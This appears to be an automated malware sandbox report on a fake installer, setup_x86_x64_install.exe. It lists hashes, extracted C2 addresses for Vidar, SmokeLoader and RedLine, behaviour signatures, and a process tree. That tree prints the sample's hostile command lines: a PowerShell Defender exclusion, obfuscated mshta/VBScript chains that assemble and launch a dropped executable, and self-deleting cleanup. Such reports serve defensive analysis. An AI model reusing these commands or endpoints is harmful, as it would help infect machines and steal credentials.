Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Resubmissions

08-10-2021 15:07

211008-shl8xsefa9 10

08-10-2021 05:38

211008-gbvqyadce8 10

07-10-2021 18:28

211007-w4jayacge3 10

Analysis

  • max time kernel
    320s
  • max time network
    1811s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    08-10-2021 15:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    5.9MB

  • MD5

    0308d3044eda0db671c58c2a97cb3c10

  • SHA1

    1737ab616a61d35b0bde0aaad949d9894e14be9e

  • SHA256

    b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072

  • SHA512

    29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e

Score
10/10
arkeiredlinesmokeloadersocelarstofseevidar916media214aspackv2backdoordiscoveryevasioninfostealerpersistenceransomwarespywarestealerthemidatrojan

Malware Config

Extracted

Family

vidar

Version

41.2

Botnet

916

C2

https://mas.to/@serg4325

Attributes
  • profile_id

    916

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

media214

C2

91.121.67.60:2151

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Arkei Stealer Payload 1 IoCs
    stealer
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 3 IoCs
    stealer
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Blocklisted process makes network request 7 IoCs
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 10 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 21 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 4 IoCs
    evasion
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 13 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 29 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2684
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2892
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2676
          • C:\Windows\system32\wbem\WMIADAP.EXE
            wmiadap.exe /F /T /R
            2⤵
              PID:6392
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2484
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2460
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1912
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1408
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1244
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                      1⤵
                        PID:1188
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1056
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                          1⤵
                          • Drops file in System32 directory
                          PID:912
                          • C:\Users\Admin\AppData\Roaming\jihwauw
                            C:\Users\Admin\AppData\Roaming\jihwauw
                            2⤵
                            • Executes dropped EXE
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:4736
                          • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                            C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                            2⤵
                              PID:7848
                            • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                              C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                              2⤵
                                PID:11360
                              • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                2⤵
                                  PID:2716
                                • C:\Users\Admin\AppData\Roaming\jihwauw
                                  C:\Users\Admin\AppData\Roaming\jihwauw
                                  2⤵
                                    PID:9528
                                  • C:\Users\Admin\AppData\Roaming\grhwauw
                                    C:\Users\Admin\AppData\Roaming\grhwauw
                                    2⤵
                                      PID:9084
                                      • C:\Users\Admin\AppData\Roaming\grhwauw
                                        C:\Users\Admin\AppData\Roaming\grhwauw
                                        3⤵
                                          PID:10816
                                      • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                        C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                        2⤵
                                          PID:8188
                                        • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                          C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                          2⤵
                                            PID:9684
                                          • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                            C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                            2⤵
                                              PID:6408
                                            • C:\Users\Admin\AppData\Roaming\grhwauw
                                              C:\Users\Admin\AppData\Roaming\grhwauw
                                              2⤵
                                                PID:11680
                                                • C:\Users\Admin\AppData\Roaming\grhwauw
                                                  C:\Users\Admin\AppData\Roaming\grhwauw
                                                  3⤵
                                                    PID:7784
                                                • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                  C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                  2⤵
                                                    PID:7160
                                                  • C:\Users\Admin\AppData\Roaming\jihwauw
                                                    C:\Users\Admin\AppData\Roaming\jihwauw
                                                    2⤵
                                                      PID:3924
                                                    • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                      C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                      2⤵
                                                        PID:6520
                                                      • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                        C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                        2⤵
                                                          PID:7040
                                                        • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                          C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                          2⤵
                                                            PID:5324
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                          1⤵
                                                            PID:340
                                                          • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                                                            1⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1000
                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:596
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\setup_install.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\setup_install.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3856
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                  4⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1312
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                    5⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3048
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe
                                                                  4⤵
                                                                    PID:1516
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu166f9a8bbe80.exe
                                                                      Thu166f9a8bbe80.exe
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Checks computer location settings
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:3116
                                                                      • C:\Users\Admin\Pictures\Adobe Films\UUf3KsEaN2cjQyBkkbRcELQI.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\UUf3KsEaN2cjQyBkkbRcELQI.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:4340
                                                                      • C:\Users\Admin\Pictures\Adobe Films\uypOf3mJrmMGrfWLkMIIoA4O.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\uypOf3mJrmMGrfWLkMIIoA4O.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:4944
                                                                      • C:\Users\Admin\Pictures\Adobe Films\zWl5ZggO5qnJrGQfa5ssIudh.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\zWl5ZggO5qnJrGQfa5ssIudh.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:4976
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 1184
                                                                          7⤵
                                                                          • Program crash
                                                                          PID:1404
                                                                      • C:\Users\Admin\Pictures\Adobe Films\WtJWnun5yqu9ncbMR67Rneyl.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\WtJWnun5yqu9ncbMR67Rneyl.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:1088
                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                          "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\WtJWnun5yqu9ncbMR67Rneyl.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\WtJWnun5yqu9ncbMR67Rneyl.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
                                                                          7⤵
                                                                            PID:5664
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\Pictures\Adobe Films\WtJWnun5yqu9ncbMR67Rneyl.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ( "C:\Users\Admin\Pictures\Adobe Films\WtJWnun5yqu9ncbMR67Rneyl.exe" ) do taskkill /f /Im "%~nxQ"
                                                                              8⤵
                                                                                PID:3088
                                                                                • C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE
                                                                                  ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9
                                                                                  9⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4748
                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                    "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
                                                                                    10⤵
                                                                                      PID:4176
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ( "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" ) do taskkill /f /Im "%~nxQ"
                                                                                        11⤵
                                                                                          PID:1800
                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                        "C:\Windows\System32\mshta.exe" VBSCripT: cLOsE ( cReAteObJeCt ( "WscRIpt.ShelL" ). RuN ( "CMd.exE /c eCHo | seT /P = ""MZ"" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q * " , 0 , TrUE ) )
                                                                                        10⤵
                                                                                          PID:4776
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c eCHo | seT /P = "MZ" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q *
                                                                                            11⤵
                                                                                              PID:5728
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                12⤵
                                                                                                  PID:5724
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>Xj5YWD.Tg"
                                                                                                  12⤵
                                                                                                    PID:5504
                                                                                                  • C:\Windows\SysWOW64\control.exe
                                                                                                    control ..\SMD2fE1.N
                                                                                                    12⤵
                                                                                                      PID:6224
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\SMD2fE1.N
                                                                                                        13⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:6356
                                                                                                        • C:\Windows\system32\RunDll32.exe
                                                                                                          C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\SMD2fE1.N
                                                                                                          14⤵
                                                                                                            PID:6900
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\SMD2fE1.N
                                                                                                              15⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:6956
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /f /Im "WtJWnun5yqu9ncbMR67Rneyl.exe"
                                                                                                  9⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:3628
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\YyIBaNAR8OkAX2ia5yuk9IxY.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\YyIBaNAR8OkAX2ia5yuk9IxY.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:2700
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\YyIBaNAR8OkAX2ia5yuk9IxY.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\YyIBaNAR8OkAX2ia5yuk9IxY.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:5816
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\cGK_d6NlsDDqmr1FTHxIut68.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\cGK_d6NlsDDqmr1FTHxIut68.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4932
                                                                                            • C:\ProgramData\build.exe
                                                                                              "C:\ProgramData\build.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks processor information in registry
                                                                                              • Modifies system certificate store
                                                                                              PID:5952
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\ProgramData\build.exe" & del C:\ProgramData\*.dll & exit
                                                                                                8⤵
                                                                                                  PID:3812
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im build.exe /f
                                                                                                    9⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:5600
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /t 6
                                                                                                    9⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:2400
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\87gTWDXs6E5jo9zxUgUSCaCu.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\87gTWDXs6E5jo9zxUgUSCaCu.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4912
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\2FybFpU3NfKSnplBno8X168D.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\2FybFpU3NfKSnplBno8X168D.exe"
                                                                                              6⤵
                                                                                              • Drops file in Drivers directory
                                                                                              • Executes dropped EXE
                                                                                              PID:4836
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                7⤵
                                                                                                  PID:5296
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                    8⤵
                                                                                                      PID:5464
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                    7⤵
                                                                                                    • Enumerates system info in registry
                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    PID:356
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8820e4f50,0x7ff8820e4f60,0x7ff8820e4f70
                                                                                                      8⤵
                                                                                                        PID:3520
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,3700844946545021253,6810854556407768869,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1676 /prefetch:8
                                                                                                        8⤵
                                                                                                          PID:3288
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,3700844946545021253,6810854556407768869,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1628 /prefetch:2
                                                                                                          8⤵
                                                                                                            PID:4144
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,3700844946545021253,6810854556407768869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2136 /prefetch:8
                                                                                                            8⤵
                                                                                                              PID:5940
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,3700844946545021253,6810854556407768869,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:1
                                                                                                              8⤵
                                                                                                                PID:6244
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,3700844946545021253,6810854556407768869,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2568 /prefetch:1
                                                                                                                8⤵
                                                                                                                  PID:6236
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,3700844946545021253,6810854556407768869,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
                                                                                                                  8⤵
                                                                                                                    PID:6460
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,3700844946545021253,6810854556407768869,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
                                                                                                                    8⤵
                                                                                                                      PID:6484
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,3700844946545021253,6810854556407768869,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
                                                                                                                      8⤵
                                                                                                                        PID:6532
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,3700844946545021253,6810854556407768869,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3856 /prefetch:1
                                                                                                                        8⤵
                                                                                                                          PID:6600
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,3700844946545021253,6810854556407768869,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3100 /prefetch:8
                                                                                                                          8⤵
                                                                                                                            PID:6924
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "cmd.exe" /C taskkill /F /PID 4836 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\2FybFpU3NfKSnplBno8X168D.exe"
                                                                                                                          7⤵
                                                                                                                            PID:4420
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /F /PID 4836
                                                                                                                              8⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:3780
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "cmd.exe" /C taskkill /F /PID 4836 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\2FybFpU3NfKSnplBno8X168D.exe"
                                                                                                                            7⤵
                                                                                                                              PID:3876
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /F /PID 4836
                                                                                                                                8⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:1800
